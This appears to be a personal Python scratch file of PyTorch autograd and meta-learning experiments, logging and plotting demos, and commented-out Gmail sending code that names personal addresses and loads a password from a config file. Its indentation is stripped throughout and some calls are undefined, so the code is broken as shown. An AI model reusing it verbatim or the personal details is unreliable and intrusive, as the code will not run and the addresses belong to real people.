# meta_opt.step()
# qry_losses = sum(qry_losses) / task_num
# qry_accs = 100. * sum(qry_accs) / task_num
# i = epoch + float(batch_idx) / n_train_iter
# iter_time = time.time() - start_time
# def inner_loop2():
# n_inner_iter = 5
# inner_opt = torch.optim.SGD(net.parameters(), lr=1e-1)
#
# qry_losses = []
# qry_accs = []
# meta_opt.zero_grad()
# meta_loss = 0
# for i in range(task_num):
# with higher.innerloop_ctx(
# net, inner_opt, copy_initial_weights=False
# ) as (fnet, diffopt):
# # Optimize the likelihood of the support set by taking
# # gradient steps w.r.t. the model's parameters.
# # This adapts the model's meta-parameters to the task.
# # higher is able to automatically keep copies of
# # your network's parameters as they are being updated.
# for _ in range(n_inner_iter):
# spt_logits = fnet(x_spt[i])
# spt_loss = F.cross_entropy(spt_logits, y_spt[i])
# diffopt.step(spt_loss)
#
# # The final set of adapted parameters will induce some
# # final loss and accuracy on the query dataset.
# # These will be used to update the model's meta-parameters.
# qry_logits = fnet(x_qry[i])
# qry_loss = F.cross_entropy(qry_logits, y_qry[i])
# qry_losses.append(qry_loss.detach())
# qry_acc = (qry_logits.argmax(
# dim=1) == y_qry[i]).sum().item() / querysz
# qry_accs.append(qry_acc)
#
# # Update the model's meta-parameters to optimize the query
# # losses across all of the tasks sampled in this batch.
# # This unrolls through the gradient steps.
# # qry_loss.backward()
# meta_loss += qry_loss
#
# qry_losses = sum(qry_losses) / task_num
# qry_losses.backward()
# meta_opt.step()
# qry_accs = 100. * sum(qry_accs) / task_num
# i = epoch + float(batch_idx) / n_train_iter
# iter_time = time.time() - start_time
def error_unexpected_way_to_by_pass_safety():
# https://stackoverflow.com/questions/62415251/why-am-i-able-to-change-the-value-of-a-tensor-without-the-computation-graph-know
import torch
a = torch.tensor([1, 2, 3.], requires_grad=True)
# are detached tensor's leafs? yes they are
a_detached = a.detach()
# a.fill_(2) # illegal, warns you that a tensor which requires grads is used in an inplace op (so it won't be recorded in computation graph so it wont take the right derivative of the forward path as this op won't be in it)
a_detached.fill_(
2) # weird that this one is allowed, seems to allow me to bypass the error check from the previous comment...?!
print(f'a = {a}')
print(f'a_detached = {a_detached}')
a.sum().backward()
def detach_playground():
import torch
a = torch.tensor([1, 2, 3.], requires_grad=True)
# are detached tensor's leafs? yes they are
a_detached = a.detach()
print(f'a_detached.is_leaf = {a_detached.is_leaf}')
# is doing sum on the detached tensor a leaf? no
a_detached_sum = a.sum()
print(f'a_detached_sum.is_leaf = {a_detached_sum.is_leaf}')
# is detaching an intermediate tensor a leaf? yes
a_sum_detached = a.sum().detach()
print(f'a_sum_detached.is_leaf = {a_sum_detached.is_leaf}')
# shows they share they same data
print(f'a == a_detached = {a == a_detached}')
print(f'a is a_detached = {a is a_detached}')
a_detached.zero_()
print(f'a = {a}')
print(f'a_detached = {a_detached}')
# a.fill_(2) # illegal, warns you that a tensor which requires grads is used in an inplace op (so it won't be recorded in computation graph so it wont take the right derivative of the forward path as this op won't be in it)
a_detached.fill_(
2) # weird that this one is allowed, seems to allow me to bypass the error check from the previous comment...?!
print(f'a = {a}')
print(f'a_detached = {a_detached}')
## conclusion: detach basically creates a totally new tensor which cuts gradient computations to the original but shares the same memory with original
out = a.sigmoid()
out_detached = out.detach()
out_detached.zero_()
out.sum().backward()
def clone_playground():
import torch
a = torch.tensor([1, 2, 3.], requires_grad=True)
a_clone = a.clone()
print(f'a_clone.is_leaf = {a_clone.is_leaf}')
print(f'a is a_clone = {a is a_clone}')
print(f'a == a_clone = {a == a_clone}')
print(f'a = {a}')
print(f'a_clone = {a_clone}')
# a_clone.fill_(2)
a_clone.mul_(2)
print(f'a = {a}')
print(f'a_clone = {a_clone}')
a_clone.sum().backward()
print(f'a.grad = {a.grad}')
def clone_vs_deepcopy():
import copy
import torch
x = torch.tensor([1, 2, 3.])
x_clone = x.clone()
x_deep_copy = copy.deepcopy(x)
#
x.mul_(-1)
print(f'x = {x}')
print(f'x_clone = {x_clone}')
print(f'x_deep_copy = {x_deep_copy}')
print()
def inplace_playground():
import torch
x = torch.tensor([1, 2, 3.], requires_grad=True)
y = x + 1
print(f'x.is_leaf = {x.is_leaf}')
print(f'y.is_leaf = {y.is_leaf}')
x += 1 # not allowed because x is a leaf, since changing the value of a leaf with an inplace forgets it's value then backward wouldn't work IMO (though its not the official response)
print(f'x.is_leaf = {x.is_leaf}')
def copy_initial_weights_playground_original():
import torch
import torch.nn as nn
import torch.optim as optim
import higher
import numpy as np
np.random.seed(1)
torch.manual_seed(3)
N = 100
actual_multiplier = 3.5
meta_lr = 0.00001
loops = 5 # how many iterations in the inner loop we want to do
x = torch.tensor(np.random.random((N, 1)), dtype=torch.float64) # features for inner training loop
y = x * actual_multiplier # target for inner training loop
model = nn.Linear(1, 1, bias=False).double() # simplest possible model - multiple input x by weight w without bias
meta_opt = optim.SGD(model.parameters(), lr=meta_lr, momentum=0.)
def run_inner_loop_once(model, verbose, copy_initial_weights):
lr_tensor = torch.tensor([0.3], requires_grad=True)
momentum_tensor = torch.tensor([0.5], requires_grad=True)
opt = optim.SGD(model.parameters(), lr=0.3, momentum=0.5)
with higher.innerloop_ctx(model, opt, copy_initial_weights=copy_initial_weights,
override={'lr': lr_tensor, 'momentum': momentum_tensor}) as (fmodel, diffopt):
for j in range(loops):
if verbose:
print('Starting inner loop step j=={0}'.format(j))
print(' Representation of fmodel.parameters(time={0}): {1}'.format(j, str(
list(fmodel.parameters(time=j)))))
print(' Notice that fmodel.parameters() is same as fmodel.parameters(time={0}): {1}'.format(j, (
list(fmodel.parameters())[0] is list(fmodel.parameters(time=j))[0])))
out = fmodel(x)
if verbose:
print(
' Notice how `out` is `x` multiplied by the latest version of weight: {0:.4} * {1:.4} == {2:.4}'.format(
x[0, 0].item(), list(fmodel.parameters())[0].item(), out[0].item()))
loss = ((out - y) ** 2).mean()
diffopt.step(loss)
if verbose:
# after all inner training let's see all steps' parameter tensors
print()
print("Let's print all intermediate parameters versions after inner loop is done:")
for j in range(loops + 1):
print(' For j=={0} parameter is: {1}'.format(j, str(list(fmodel.parameters(time=j)))))
print()
# let's imagine now that our meta-learning optimization is trying to check how far we got in the end from the actual_multiplier
weight_learned_after_full_inner_loop = list(fmodel.parameters())[0]
meta_loss = (weight_learned_after_full_inner_loop - actual_multiplier) ** 2
print(' Final meta-loss: {0}'.format(meta_loss.item()))
meta_loss.backward() # will only propagate gradient to original model parameter's `grad` if copy_initial_weight=False
if verbose:
print(' Gradient of final loss we got for lr and momentum: {0} and {1}'.format(lr_tensor.grad,
momentum_tensor.grad))
print(
' If you change number of iterations "loops" to much larger number final loss will be stable and the values above will be smaller')
return meta_loss.item()
print('=================== Run Inner Loop First Time (copy_initial_weights=True) =================\n')
meta_loss_val1 = run_inner_loop_once(model, verbose=True, copy_initial_weights=True)
print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
list(model.parameters())[0].grad))
print('=================== Run Inner Loop Second Time (copy_initial_weights=False) =================\n')
meta_loss_val2 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
list(model.parameters())[0].grad))
print('=================== Run Inner Loop Third Time (copy_initial_weights=False) =================\n')
final_meta_gradient = list(model.parameters())[0].grad.item()
# Now let's double-check `higher` library is actually doing what it promised to do, not just giving us
# a bunch of hand-wavy statements and difficult to read code.
# We will do a simple SGD step using meta_opt changing initial weight for the training and see how meta loss changed
meta_opt.step()
meta_opt.zero_grad()
meta_step = - meta_lr * final_meta_gradient # how much meta_opt actually shifted inital weight value
meta_loss_val3 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
def copy_initial_weights_playground():
import torch
import torch.nn as nn
import torch.optim as optim
import higher
import numpy as np
np.random.seed(1)
torch.manual_seed(3)
N = 100
actual_multiplier = 3.5 # the parameters we want the model to learn
meta_lr = 0.00001
loops = 5 # how many iterations in the inner loop we want to do
x = torch.randn(N, 1) # features for inner training loop
y = x * actual_multiplier # target for inner training loop
model = nn.Linear(1, 1,
bias=False) # model(x) = w*x, simplest possible model - multiple input x by weight w without bias. goal is to w~~actualy_multiplier
outer_opt = optim.SGD(model.parameters(), lr=meta_lr, momentum=0.)
def run_inner_loop_once(model, verbose, copy_initial_weights):
lr_tensor = torch.tensor([0.3], requires_grad=True)
momentum_tensor = torch.tensor([0.5], requires_grad=True)
inner_opt = optim.SGD(model.parameters(), lr=0.3, momentum=0.5)
with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=copy_initial_weights,
override={'lr': lr_tensor, 'momentum': momentum_tensor}) as (fmodel, diffopt):
for j in range(loops):
if verbose:
print('Starting inner loop step j=={0}'.format(j))
print(' Representation of fmodel.parameters(time={0}): {1}'.format(j, str(
list(fmodel.parameters(time=j)))))
print(' Notice that fmodel.parameters() is same as fmodel.parameters(time={0}): {1}'.format(j, (
list(fmodel.parameters())[0] is list(fmodel.parameters(time=j))[0])))
out = fmodel(x)
if verbose:
print(
f' Notice how `out` is `x` multiplied by the latest version of weight: {x[0, 0].item()} * {list(fmodel.parameters())[0].item()} == {out[0].item()}')
loss = ((out - y) ** 2).mean()
diffopt.step(loss)
if verbose:
# after all inner training let's see all steps' parameter tensors
print()
print("Let's print all intermediate parameters versions after inner loop is done:")
for j in range(loops + 1):
print(' For j=={0} parameter is: {1}'.format(j, str(list(fmodel.parameters(time=j)))))
print()
# let's imagine now that our meta-learning optimization is trying to check how far we got in the end from the actual_multiplier
weight_learned_after_full_inner_loop = list(fmodel.parameters())[0]
meta_loss = (weight_learned_after_full_inner_loop - actual_multiplier) ** 2
print(' Final meta-loss: {0}'.format(meta_loss.item()))
meta_loss.backward() # will only propagate gradient to original model parameter's `grad` if copy_initial_weight=False
if verbose:
print(' Gradient of final loss we got for lr and momentum: {0} and {1}'.format(lr_tensor.grad,
momentum_tensor.grad))
print(
' If you change number of iterations "loops" to much larger number final loss will be stable and the values above will be smaller')
return meta_loss.item()
print('=================== Run Inner Loop First Time (copy_initial_weights=True) =================\n')
meta_loss_val1 = run_inner_loop_once(model, verbose=True, copy_initial_weights=True)
print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
list(model.parameters())[0].grad))
print('=================== Run Inner Loop Second Time (copy_initial_weights=False) =================\n')
meta_loss_val2 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
list(model.parameters())[0].grad))
print('=================== Run Inner Loop Third Time (copy_initial_weights=False) =================\n')
final_meta_gradient = list(model.parameters())[0].grad.item()
# Now let's double-check `higher` library is actually doing what it promised to do, not just giving us
# a bunch of hand-wavy statements and difficult to read code.
# We will do a simple SGD step using meta_opt changing initial weight for the training and see how meta loss changed
outer_opt.step()
outer_opt.zero_grad()
meta_step = - meta_lr * final_meta_gradient # how much meta_opt actually shifted inital weight value
meta_loss_val3 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
meta_loss_gradient_approximation = (meta_loss_val3 - meta_loss_val2) / meta_step
print()
print(
'Side-by-side meta_loss_gradient_approximation and gradient computed by `higher` lib: {0:.4} VS {1:.4}'.format(
meta_loss_gradient_approximation, final_meta_gradient))
def tqdm_torchmeta():
from torchvision.transforms import Compose, Resize, ToTensor
import torchmeta
from torchmeta.datasets.helpers import miniimagenet
from pathlib import Path
from types import SimpleNamespace
from tqdm import tqdm
## get args
args = SimpleNamespace(episodes=5, n_classes=5, k_shot=5, k_eval=15, meta_batch_size=1, n_workers=4)
args.data_root = Path("~/automl-meta-learning/data/miniImagenet").expanduser()
## get meta-batch loader
train_transform = Compose([Resize(84), ToTensor()])
dataset = miniimagenet(
args.data_root,
ways=args.n_classes,
shots=args.k_shot,
test_shots=args.k_eval,
meta_split='train',
download=False)
dataloader = torchmeta.utils.data.BatchMetaDataLoader(
dataset,
batch_size=args.meta_batch_size,
num_workers=args.n_workers)
with tqdm(dataset):
print(f'len(dataloader)= {len(dataloader)}')
for episode, batch in enumerate(dataloader):
print(f'episode = {episode}')
train_inputs, train_labels = batch["train"]
print(f'train_labels[0] = {train_labels[0]}')
print(f'train_inputs.size() = {train_inputs.size()}')
pass
if episode >= args.episodes:
break
# if __name__ == "__main__":
# start = time.time()
# print('pytorch playground!')
# # params_in_comp_graph()
# # check_if_tensor_is_detached()
# # deep_copy_issue()
# # download_mini_imagenet()
# # extract()
# # download_and_extract_miniImagenet(root='~/tmp')
# # download_and_extract_miniImagenet(root='~/automl-meta-learning/data')
# # torch_concat()
# # detach_vs_cloe()
# # error_unexpected_way_to_by_pass_safety()
# # clone_playground()
# # inplace_playground()
# # clone_vs_deepcopy()
# # copy_initial_weights_playground()
# tqdm_torchmeta()
# print('--> DONE')
# time_passed_msg, _, _, _ = report_times(start)
# print(f'--> {time_passed_msg}')
# %%
import sys
print(sys.version) ##
print(sys.path)
def helloworld():
print('helloworld')
print('hello12345')
def union_dicts():
d1 = {'x': 1}
d2 = {'y': 2, 'z': 3}
d_union = {**d1, **d2}
print(d_union)
def get_stdout_old():
import sys
# contents = ""
# #with open('some_file.txt') as f:
# #with open(sys.stdout,'r') as f:
# # sys.stdout.mode = 'r'
# for line in sys.stdout.readlines():
# contents += line
# print(contents)
# print(sys.stdout)
# with open(sys.stdout.buffer) as f:
# print(f.readline())
# import subprocess
# p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# stdout = []
# while True:
# line = p.stdout.readline()
# stdout.append(line)
# print( line )
# if line == '' and p.poll() != None:
# break
# print( ''.join(stdout) )
import sys
myfile = "input.txt"
def print(*args):
__builtins__.print(*args, file=sys.__stdout__)
with open(myfile, "a+") as f:
__builtins__.print(*args, file=f)
print('a')
print('b')
print('c')
repr(sys.stdout)
def get_stdout():
import sys
myfile = "my_stdout.txt"
# redefine print
def print(*args):
__builtins__.print(*args, file=sys.__stdout__) # prints to terminal
with open(myfile, "a+") as f:
__builtins__.print(*args, file=f) # saves in a file
print('a')
print('b')
print('c')
def logging_basic():
import logging
logging.warning('Watch out!') # will print a message to the console
logging.info('I told you so') # will not print anything
def logging_to_file():
import logging
logging.basicConfig(filename='example.log', level=logging.DEBUG)
# logging.
logging.debug('This message should go to the log file')
logging.info('So should this')
logging.warning('And this, too')
def logging_to_file_INFO_LEVEL():
import logging
import sys
format = '{asctime}:{levelname}:{name}:lineno {lineno}:{message}'
logging.basicConfig(filename='example.log', level=logging.INFO, format=format, style='{')
# logging.basicConfig(stream=sys.stdout,level=logging.INFO,format=format,style='{')
# logging.
logging.debug('This message should NOT go to the log file')
logging.info('This message should go to log file')
logging.warning('This, too')
def logger_SO_print_and_write_to_my_stdout():
"""My sample logger code to print to screen and write to file (the same thing).
Note: trying to replace this old answer of mine using a logger:
- https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
Credit:
- https://www.youtube.com/watch?v=jxmzY9soFXg&t=468s
- https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
- https://stackoverflow.com/questions/21494468/about-notset-in-python-logging/21494716#21494716
Other resources:
- https://docs.python-guide.org/writing/logging/
- https://docs.python.org/3/howto/logging.html#logging-basic-tutorial
- https://stackoverflow.com/questions/61084916/how-does-one-make-an-already-opened-file-readable-e-g-sys-stdout/61255375#61255375
"""
from pathlib import Path
import logging
import os
import sys
from datetime import datetime
## create directory (& its parents) if it does not exist otherwise do nothing :)
# get current time
current_time = datetime.now().strftime('%b%d_%H-%M-%S')
logs_dirpath = Path(f'~/logs/python_playground_logs_{current_time}/').expanduser()
logs_dirpath.mkdir(parents=True, exist_ok=True)
my_stdout_filename = logs_dirpath / Path('my_stdout.log')
# remove my_stdout if it exists (note you can also just create a new log dir/file each time or append to the end of the log file your using)
# os.remove(my_stdout_filename) if os.path.isfile(my_stdout_filename) else None
## create top logger
logger = logging.getLogger(
__name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
logger.setLevel(
logging.DEBUG) # note: use logging.DEBUG, CAREFUL with logging.UNSET: https://stackoverflow.com/questions/21494468/about-notset-in-python-logging/21494716#21494716
## log to my_stdout.log file
file_handler = logging.FileHandler(filename=my_stdout_filename)
# file_handler.setLevel(logging.INFO) # not setting it means it inherits the logger. It will log everything from DEBUG upwards in severity to this handler.
log_format = "{asctime}:{levelname}:{lineno}:{name}:{message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
formatter = logging.Formatter(fmt=log_format, style='{') # set the logging format at for this handler
file_handler.setFormatter(fmt=formatter)
## log to stdout/screen
stdout_stream_handler = logging.StreamHandler(
stream=sys.stdout) # default stderr, though not sure the advatages of logging to one or the other
# stdout_stream_handler.setLevel(logging.INFO) # Note: having different set levels means that we can route using a threshold what gets logged to this handler
log_format = "{name}:{levelname}:-> {message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
formatter = logging.Formatter(fmt=log_format, style='{') # set the logging format at for this handler
stdout_stream_handler.setFormatter(fmt=formatter)
logger.addHandler(hdlr=file_handler) # add this file handler to top logger
logger.addHandler(hdlr=stdout_stream_handler) # add this file handler to top logger
logger.log(logging.NOTSET, 'notset')
logger.debug('debug')
logger.info('info')
logger.warning('warning')
logger.error('error')
logger.critical('critical')
def logging_unset_level():
"""My sample logger explaining UNSET level
Resources:
- https://stackoverflow.com/questions/21494468/about-notset-in-python-logging
- https://www.youtube.com/watch?v=jxmzY9soFXg&t=468s
- https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
"""
import logging
logger = logging.getLogger(
__name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
print(f'DEFAULT VALUE: logger.level = {logger.level}')
file_handler = logging.FileHandler(filename='my_log.log')
log_format = "{asctime}:{levelname}:{lineno}:{name}:{message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
formatter = logging.Formatter(fmt=log_format, style='{')
file_handler.setFormatter(fmt=formatter)
stdout_stream_handler = logging.StreamHandler(stream=sys.stdout)
stdout_stream_handler.setLevel(logging.INFO)
log_format = "{name}:{levelname}:-> {message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
formatter = logging.Formatter(fmt=log_format, style='{')
stdout_stream_handler.setFormatter(fmt=formatter)
logger.addHandler(hdlr=file_handler)
logger.addHandler(hdlr=stdout_stream_handler)
logger.log(logging.NOTSET, 'notset')
logger.debug('debug')
logger.info('info')
logger.warning('warning')
logger.error('error')
logger.critical('critical')
def logger():
from pathlib import Path
import logging
# create directory (& its parents) if it does not exist otherwise do nothing :)
logs_dirpath = Path('~/automl-meta-learning/logs/python_playground_logs/').expanduser()
logs_dirpath.mkdir(parents=True, exist_ok=True)
my_stdout_filename = logs_dirpath / Path('my_stdout.log')
# remove my_stdout if it exists (used to have this but now I decided to create a new log & file each)
# os.remove(my_stdout_filename) if os.path.isfile(my_stdout_filename) else None
logger = logging.getLogger(
__name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
logger.setLevel(logging.INFO)
log_format = "{asctime}:{levelname}:{name}:{message}"
formatter = logging.Formatter(fmt=log_format, style='{')
file_handler = logging.FileHandler(filename=my_stdout_filename)
file_handler.setFormatter(fmt=formatter)
logger.addHandler(hdlr=file_handler)
logger.addHandler(hdlr=logging.StreamHandler())
for i in range(3):
logger.info(f'i = {i}')
logger.info(f'logger DONE')
def logging_example_from_youtube():
"""https://github.com/CoreyMSchafer/code_snippets/blob/master/Logging-Advanced/employee.py
"""
import logging
# import pytorch_playground # has employee class & code
import sys
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s:%(message)s')
file_handler = logging.FileHandler('sample.log')
file_handler.setLevel(logging.ERROR)
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
logger.critical('not really critical :P')
def add(x, y):
"""Add Function"""
return x + y
def subtract(x, y):
"""Subtract Function"""
return x - y
def multiply(x, y):
"""Multiply Function"""
return x * y
def divide(x, y):
"""Divide Function"""
try:
result = x / y
except ZeroDivisionError:
logger.exception('Tried to divide by zero')
else:
return result
logger.info(
'testing if log info is going to print to screen. it should because everything with debug or above is printed since that stream has that level.')
num_1 = 10
num_2 = 0
add_result = add(num_1, num_2)
logger.debug('Add: {} + {} = {}'.format(num_1, num_2, add_result))
sub_result = subtract(num_1, num_2)
logger.debug('Sub: {} - {} = {}'.format(num_1, num_2, sub_result))
mul_result = multiply(num_1, num_2)
logger.debug('Mul: {} * {} = {}'.format(num_1, num_2, mul_result))
div_result = divide(num_1, num_2)
logger.debug('Div: {} / {} = {}'.format(num_1, num_2, div_result))
def plot():
"""
source:
- https://www.youtube.com/watch?v=UO98lJQ3QGI
- https://github.com/CoreyMSchafer/code_snippets/blob/master/Python/Matplotlib/01-Introduction/finished_code.py
"""
from matplotlib import pyplot as plt
plt.xkcd()
ages_x = [18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35,
36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55]
py_dev_y = [20046, 17100, 20000, 24744, 30500, 37732, 41247, 45372, 48876, 53850, 57287, 63016, 65998, 70003, 70000,
71496, 75370, 83640, 84666,
84392, 78254, 85000, 87038, 91991, 100000, 94796, 97962, 93302, 99240, 102736, 112285, 100771, 104708,
108423, 101407, 112542, 122870, 120000]
plt.plot(ages_x, py_dev_y, label='Python')
js_dev_y = [16446, 16791, 18942, 21780, 25704, 29000, 34372, 37810, 43515, 46823, 49293, 53437, 56373, 62375, 66674,
68745, 68746, 74583, 79000,
78508, 79996, 80403, 83820, 88833, 91660, 87892, 96243, 90000, 99313, 91660, 102264, 100000, 100000,
91660, 99240, 108000, 105000, 104000]
plt.plot(ages_x, js_dev_y, label='JavaScript')
dev_y = [17784, 16500, 18012, 20628, 25206, 30252, 34368, 38496, 42000, 46752, 49320, 53200, 56000, 62316, 64928,
67317, 68748, 73752, 77232,
78000, 78508, 79536, 82488, 88935, 90000, 90056, 95000, 90000, 91633, 91660, 98150, 98964, 100000, 98988,
100000, 108923, 105000, 103117]
plt.plot(ages_x, dev_y, color='#444444', linestyle='--', label='All Devs')
plt.xlabel('Ages')
plt.ylabel('Median Salary (USD)')
plt.title('Median Salary (USD) by Age')
plt.legend()
plt.tight_layout()
plt.savefig('plot.png')
plt.show()
def subplot():
"""https://github.com/CoreyMSchafer/code_snippets/blob/master/Python/Matplotlib/10-Subplots/finished_code.py
"""
import pandas as pd
from matplotlib import pyplot as plt
plt.style.use('seaborn')
data = read_csv('data.csv')
ages = data['Age']
dev_salaries = data['All_Devs']
py_salaries = data['Python']
js_salaries = data['JavaScript']
fig1, ax1 = plt.subplots()
fig2, ax2 = plt.subplots()
ax1.plot(ages, dev_salaries, color='#444444',
linestyle='--', label='All Devs')
ax2.plot(ages, py_salaries, label='Python')
ax2.plot(ages, js_salaries, label='JavaScript')
ax1.legend()
ax1.set_title('Median Salary (USD) by Age')
ax1.set_ylabel('Median Salary (USD)')
ax2.legend()
ax2.set_xlabel('Ages')
ax2.set_ylabel('Median Salary (USD)')
plt.tight_layout()
plt.show()
fig1.savefig('fig1.png')
fig2.savefig('fig2.png')
#
# def import_utils_test():
# import uutils
# # import uutils.utils as utils
# # from uutils.utils import logger
#
# print(uutils)
# print(utils)
# print(logger)
#
# print()
def sys_path():
"""
python -c "import sys; print(sys.path)”
python -c "import sys; [print(p) for p in sys.path]"
"""
import sys
def path():
import sys
[print(p) for p in sys.path]
for path in sys.path:
print(path)
def pycharm_playground():
import tqdm
print('running pycharm playground...')
b = 0
print(b)
print('Intermediate print line')
print(b)
print(b)
print('Done!')
if __name__ == '__main__':
# union_dicts()
# get_stdout()
# logger()
# logger_SO_print_and_write_to_my_stdout()
# logging_basic()
# logging_to_file()
# logging_to_file()
# logging_to_file_INFO_LEVEL()
# logging_example_from_youtube()
# logging_unset_level()
# import_utils_test()
pycharm_playground()
print('\n---> DONE\a\n\n') ## HIii
# %%
import sys
print(sys.version)
# %%
## dictionary comprehension looping
d = {'a': 0, 'b': 1}
lst1 = [f'key:{k}' for k in d]
lst2 = [f'key:{k}, value:{v}' for k, v in d.items()]
print(lst1)
print(lst2)
# %%
## merging two dictionaries
d1 = {'a': 0, 'b': 1}
d2 = {'c': 2, 'd': 3}
d3 = {'e': 4, 'f': 5, 'g': 6}
d = {**d1, **d2, **d3}
print(d)
# %%
from collections import OrderedDict
od = OrderedDict([
('first', 1)
])
print(od)
od['first'] = 2
print(od)
lst = sum([i for i in range(3)])
print(lst)
od3 = OrderedDict([(i, i) for i in range(3)])
print(od3)
print(3 + float('Inf'))
# %%
# import pathlib
# from pathlib import Path
#
#
# def make_dirpath_current_datetime_hostname(path=None, comment='', replace_dots=True):
# '''
# make dir string: runs/CURRENT_DATETIME_HOSTNAME
# '''
# import socket
# import os
# from datetime import datetime
# # check if root is a PosixPath object
# if type(path) != pathlib.PosixPath and path is not None:
# path = Path(path)
# current_time = datetime.now().strftime('%b%d_%H-%M-%S')
# log_dir = os.path.join('runs', current_time + '_' + socket.gethostname() + comment)
# log_dir = Path(log_dir)
# print(log_dir._str)
# if replace_dots:
# log_dir = Path(log_dir._str.replace('.', '_'))
# if path is not None:
# log_dir = path / log_dir
# return log_dir
#
#
# print(type(Path('~')) == pathlib.PosixPath)
# print()
#
# log_dir = make_dirpath_current_datetime_hostname()
# print(log_dir)
# log_dir = make_dirpath_current_datetime_hostname('~')
# print(log_dir)
# log_dir = make_dirpath_current_datetime_hostname('~', '_jupyter')
# print(log_dir)
# log_dir = make_dirpath_current_datetime_hostname('~').expanduser()
# print(log_dir)
#
# string = "geeks for geeks geeks geeks geeks"
# # Prints the string by replacing geeks by Geeks
# print(string.replace("geeks", "Geeks"))
#
# log_dir = make_dirpath_current_datetime_hostname('~', '_jupyter', True)
# print(log_dir)
# %%
# adding keys to empty dic
d = {}
d['a'] = 3
print(d)
# %%
# unpack list?
(a, b, c) = [1, 2, 3]
print(a)
# %%
## kwargs
def f(*args, **kwargs):
print(args)
print(kwargs)
f()
f(1, 2, 3, a=1, b=2, c=3)
# %%
#
# import json
#
# from pathlib import Path
#
# p = Path('~/').expanduser()
# with open(p) as f:
# data = json.load(f)
# print(data)
# print(data['password'])
# %%
import subprocess
from subprocess import Popen, PIPE, STDOUT
cmd = 'ls /etc/fstab /etc/non-existent-file'
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
output = p.stdout.read()
print(output)
# %%
import sys
print('a')
print(sys.stdout)
# %%
# from pathlib import Path
#
#
# def send_email(subject, message, destination, password_path=None):
# """ Send an e-mail from with message to destination email.
#
# NOTE: if you get an error with google gmails you might need to do this:
# https://stackoverflow.com/questions/16512592/login-credentials-not-working-with-gmail-smtp
# To use an app password:
# https://stackoverflow.com/questions/60975490/how-does-one-send-an-e-mail-from-python-not-using-gmail
#
# Arguments:
# message {str} -- message string to send.
# destination {str} -- destination email (as string)
# """
# from socket import gethostname
# from email.message import EmailMessage
# import smtplib
# import json
# import sys
#
# server = smtplib.SMTP('smtp.gmail.com', 587)
# smtplib.stdout = sys.stdout
# server.starttls()
# with open(password_path) as f:
# config = json.load(f)
# server.login('slurm.miranda@gmail.com', config['password'])
#
# # craft message
# msg = EmailMessage()
#
# # message = f'{message}\nSend from Hostname: {gethostname()}'
# # msg.set_content(message)
# msg['Subject'] = subject
# msg['From'] = 'slurm.miranda@gmail.com'
# msg['To'] = destination
# # send msg
# server.send_message(msg)
#
#
# ##
# print("-------> HELLOWWWWWWWW")
# p = Path('~/automl-meta-learning/automl/experiments/pw_app.config.json').expanduser()
# send_email(subject='TEST: send_email2', message='MESSAGE', destination='brando.science@gmail.com', password_path=p)
# %%
"""
Demo of the errorbar function, including upper and lower limits
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams["errorbar.capsize"] = 3
# https://stackoverflow.com/questions/61415955/why-dont-the-error-limits-in-my-plots-show-in-matplotlib
# example data
x = np.arange(0.5, 5.5, 0.5)
y = np.exp(-x)
xerr = 0.1
yerr = 0.2
ls = 'dotted'
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
# standard error bars
plt.errorbar(x, y, xerr=xerr, yerr=yerr, ls=ls, color='blue')
# including upper limits
uplims = np.zeros(x.shape)
uplims[[1, 5, 9]] = True
plt.errorbar(x, y + 0.5, xerr=xerr, yerr=yerr, uplims=uplims, ls=ls,
color='green')
# including lower limits
lolims = np.zeros(x.shape)
lolims[[2, 4, 8]] = True
plt.errorbar(x, y + 1.0, xerr=xerr, yerr=yerr, lolims=lolims, ls=ls,
color='red')
# including upper and lower limits
plt.errorbar(x, y + 1.5, marker='o', ms=8, xerr=xerr, yerr=yerr,
lolims=lolims, uplims=uplims, ls=ls, color='magenta')
# including xlower and xupper limits
xerr = 0.2
yerr = np.zeros(x.shape) + 0.2
yerr[[3, 6]] = 0.3
xlolims = lolims
xuplims = uplims
lolims = np.zeros(x.shape)
uplims = np.zeros(x.shape)
lolims[[6]] = True
uplims[[3]] = True
plt.errorbar(x, y + 2.1, marker='o', ms=8, xerr=xerr, yerr=yerr,
xlolims=xlolims, xuplims=xuplims, uplims=uplims, lolims=lolims,
ls='none', mec='blue', capsize=0, color='cyan')
ax.set_xlim((0, 5.5))
ax.set_title('Errorbar upper and lower limits')
plt.show()
# %%
from types import SimpleNamespace
from pathlib import Path
from pprint import pprint
args = SimpleNamespace()
args.data_root = "~/automl-meta-learning/data/miniImagenet"
args.data_root = Path(args.data_root).expanduser()
print(args)
# pprint(dir(args.data_root))
